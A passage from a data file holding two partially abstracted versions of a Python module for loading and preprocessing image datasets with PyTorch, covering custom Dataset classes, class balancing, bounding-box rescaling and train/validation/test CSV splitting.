col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\ndef extract_data(dt):\n x = []\n y = []\n for a, b in dt:\n x.append(a)\n y.append(b)\n return x, y\n\n\ndef listdir_fullpath(d):\n return [os.path.join(d, f) for f in os.listdir(d)]\n\n\ndef get_minorities(df, thresh=0.8):\n c = df.iloc[:, 1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [(1 - x / max_count) for x in lc]\n diffs = dict((k, v) for k, v in zip(c.keys(), diffs))\n minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *\n max_count]\n return minorities, diffs\n\n\ndef csv_from_path(path, img_dest):\n path = Path(path)\n img_dest = Path(img_dest)\n labels_paths = list(path.iterdir())\n tr_images = []\n tr_labels = []\n for l in labels_paths:\n if l.is_dir():\n for i in list(l.iterdir()):\n if i.suffix in IMG_EXTENSIONS:\n name = i.name\n label = l.name\n new_name = '{}_{}'.format(path.name, name)\n new_path = img_dest / new_name\n os.rename(i, new_path)\n tr_images.append(new_name)\n tr_labels.append(label)\n tr_img_label = {'Img': tr_images, 'Label': tr_labels}\n csv = pd.DataFrame(tr_img_label, columns=['Img', 'Label'])\n csv = csv.sample(frac=1).reset_index(drop=True)\n return csv\n\n\n<function token>\n\n\ndef one_hot(targets, multi=False):\n if multi:\n binerizer = MultiLabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n else:\n binerizer = LabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n return dai_1hot, binerizer.classes_\n\n\ndef get_index(arr, a):\n for i in range(len(arr)):\n if sum(arr[i] == a) == len(a):\n return i\n return False\n\n\ndef rescale_bbox(bb, row_scale, col_scale):\n bb = bb.reshape((-1, 4))\n for b in bb:\n r1, c1, r2, c2 = b\n b[0] = int(np.round(r1 * col_scale))\n b[1] = int(np.round(c1 * row_scale))\n b[2] = int(np.round(r2 * col_scale))\n b[3] = int(np.round(c2 * row_scale))\n bb = bb.reshape((1, -1))\n return bb\n\n\ndef get_img_stats(dataset, sz):\n size = int(len(dataset) * sz)\n i = 0\n imgs = []\n for img, _ in dataset:\n if i > size:\n break\n imgs.append(img)\n i += 1\n imgs_ = torch.stack(imgs, dim=3)\n imgs_ = imgs_.view(3, -1)\n imgs_mean = imgs_.mean(dim=1)\n imgs_std = imgs_.std(dim=1)\n return imgs_mean, imgs_std\n\n\n<function token>\n\n\ndef save_obj(obj, path):\n with open(path, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\ndef extract_data(dt):\n x = []\n y = []\n for a, b in dt:\n x.append(a)\n y.append(b)\n return x, y\n\n\ndef listdir_fullpath(d):\n return [os.path.join(d, f) for f in os.listdir(d)]\n\n\ndef get_minorities(df, thresh=0.8):\n c = df.iloc[:, 1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [(1 - x / max_count) for x in lc]\n diffs = dict((k, v) for k, v in zip(c.keys(), diffs))\n minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *\n max_count]\n return minorities, diffs\n\n\ndef csv_from_path(path, img_dest):\n path = Path(path)\n img_dest = Path(img_dest)\n labels_paths = list(path.iterdir())\n tr_images = []\n tr_labels = []\n for l in labels_paths:\n if l.is_dir():\n for i in list(l.iterdir()):\n if i.suffix in IMG_EXTENSIONS:\n name = i.name\n label = l.name\n new_name = '{}_{}'.format(path.name, name)\n new_path = img_dest / new_name\n os.rename(i, new_path)\n tr_images.append(new_name)\n tr_labels.append(label)\n tr_img_label = {'Img': tr_images, 'Label': tr_labels}\n csv = pd.DataFrame(tr_img_label, columns=['Img', 'Label'])\n csv = csv.sample(frac=1).reset_index(drop=True)\n return csv\n\n\n<function token>\n\n\ndef one_hot(targets, multi=False):\n if multi:\n binerizer = MultiLabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n else:\n binerizer = LabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n return dai_1hot, binerizer.classes_\n\n\n<function token>\n\n\ndef rescale_bbox(bb, row_scale, col_scale):\n bb = bb.reshape((-1, 4))\n for b in bb:\n r1, c1, r2, c2 = b\n b[0] = int(np.round(r1 * col_scale))\n b[1] = int(np.round(c1 * row_scale))\n b[2] = int(np.round(r2 * col_scale))\n b[3] = int(np.round(c2 * row_scale))\n bb = bb.reshape((1, -1))\n return bb\n\n\ndef get_img_stats(dataset, sz):\n size = int(len(dataset) * sz)\n i = 0\n imgs = []\n for img, _ in dataset:\n if i > size:\n break\n imgs.append(img)\n i += 1\n imgs_ = torch.stack(imgs, dim=3)\n imgs_ = imgs_.view(3, -1)\n imgs_mean = imgs_.mean(dim=1)\n imgs_std = imgs_.std(dim=1)\n return imgs_mean, imgs_std\n\n\n<function token>\n\n\ndef save_obj(obj, path):\n with open(path, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, 